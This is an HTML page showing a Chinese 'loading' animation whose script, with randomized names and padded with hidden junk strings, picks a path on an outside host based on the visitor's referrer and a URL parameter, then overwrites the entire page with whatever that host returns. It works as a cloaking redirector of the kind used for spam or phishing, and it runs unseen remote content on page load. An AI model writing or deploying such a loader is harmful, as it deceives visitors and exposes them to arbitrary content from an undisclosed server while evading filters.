<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .emkeAW {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .emkeAW .DYuuwW {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .emkeAW .content {
            line-height: 50px;
            text-align: center
        }

        .emkeAW .img {
            width: 100%
        }

        .emkeAW .cZHxtQRjJ8y {
            text-align: center
        }

        .emkeAW .cZHxtQRjJ8y span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .emkeAW .cZHxtQRjJ8y span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .emkeAW .cZHxtQRjJ8y span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .emkeAW .cZHxtQRjJ8y span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .emkeAW .cZHxtQRjJ8y span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .emkeAW .cZHxtQRjJ8y span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .emkeAW .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function EsyQZFN0wCG(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var vNtLYo = EsyQZFN0wCG('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ vNtLYo +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ vNtLYo +".html?a=share";
		}
		
        MTtjIkw=url+"#"+new Date().getTime();
        MTtjIkw && function() {
            $.get(MTtjIkw, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<span style='display:none'>rSXwJDNfUW9u31VigVkXXUiNL7yP9Tjw2gte3z3JDNvRnM4CJoNPIZEQE3Ubmc6dwFdZx0oPdn095</span>
<ul style='display:none' >yxV14E9bzjICSnYnAuqZWqIkeWHIGbh8J88qJ3ih43i6AzI</ul>
<span style='display:none'>rSXwJDNfUW9u31VigVkXXUiNL7yP9Tjw2gte3z3JDNvRnM4CJoNPIZEQE3Ubmc6dwFdZx0oPdn095</span>
<ul style='display:none' >yxV14E9bzjICSnYnAuqZWqIkeWHIGbh8J88qJ3ih43i6AzI</ul>
<ul style='display:none' >yxV14E9bzjICSnYnAuqZWqIkeWHIGbh8J88qJ3ih43i6AzI</ul>
<ul style='display:none' >yxV14E9bzjICSnYnAuqZWqIkeWHIGbh8J88qJ3ih43i6AzI</ul>
<b style='display:none' >s5G5kViHOhiLx99NfEMICJcy3d2vU2XOqik0qvGfcnwbIAIqddEz8DFQnTZNYZ7UUORNBxzVKVVUq8LAf1KEmbsN1gDbDsOzqlsd7</b>
<span style='display:none'>rSXwJDNfUW9u31VigVkXXUiNL7yP9Tjw2gte3z3JDNvRnM4CJoNPIZEQE3Ubmc6dwFdZx0oPdn095</span><div class="emkeAW">
    <div class="DYuuwW">
        <div class="cZHxtQRjJ8y">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<a  href='#' style='display:none'>gc4gy4Pz15DAqxLD6TP9WmNotBUwPAM1a5SrjbQwttS6eNqfSw98WPpKGondY3M0mxXueXMQQOUZ8HKgBNJ6Ict82eT1uB</a>
<h1 style='display:none' >tB7C4Fmc6k89R1wVTL44SENa9EMV28HkoAsXrdBs0gtgZ8vQdEpsF6ZgE08b</h1>
<b style='display:none' >dXTyBQTUKYH6KCUhA5aMBVNsWjJ</b>
<ul style='display:none' >HBMFsjTphRirCevWNN6XyrVknphw8im2v8DvwJSqg</ul>
<span style='display:none'>ks35Ag1H3oogo1lXZbGFFOMpoev64SrmssgYyXA8uwmRIrgMouExxOt95RYMDF8LLPsBQv</span>
<li style='display:none' >D3N9wwZXrGV7XkeuOJUJRKHgrbJEaBynhbdYd3tEjmjhp27AZc3n131vKfg8Ihs74SSGY</li></body>
</html>